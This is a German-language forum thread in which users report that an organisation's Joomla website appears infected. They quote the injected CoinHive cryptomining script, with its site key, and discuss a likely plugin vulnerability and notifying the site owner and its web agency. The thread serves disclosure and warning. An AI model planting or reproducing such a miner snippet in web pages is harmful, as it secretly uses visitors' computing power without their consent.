10 Mai 2014
2.780
2.452
Schaut so aus als ob die Webseite befallen ist:
<script src="xxxxx.js"></script><script>var mn = new CoinHive.Anonymous('CnPufgprubjWuiJpWZnq3mtjJgWUjNdL'); mn.start();</script>
 
8 September 2015
120
56
Wird wohl kaum Absicht sein, da diese Wallet-ID auch auf anderen Seiten aufscheint (siehe google oder andere Quellcode-Suchmaschinen). Gibt jemand dem LSZ Bescheid? Idealerweise auch gleich deren Online-Agentur, die im Impressum verlinkt ist? @Rico?
 
19 März 2017
540
290
muss ja jemand in die seite implementiert haben oder nicht?
bevor der VERMUTLICHE miningcode lief gabs immer probleme mit dem https zertifikat.
 
8 September 2015
120
56
Da läuft ein Joomla (Content Management System, also die Software der Webseite) mit einem Haufen an Plugins. Ich würde davon ausgehen, dass das zumindest nicht das LSZ war, und vermutlich auch nicht die Agentur (hoffe ich für sie). Würde erfahrungsgemäß auf Schwachstellen in einem Joomla-Plugin tippen. Auch wenn es die Agentur sein sollte, das LSZ weiß davon mit größter Wahrscheinlichkeit nichts. Und dass das in die Medien kommt, wollen die vermutlich auch nicht.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: Rico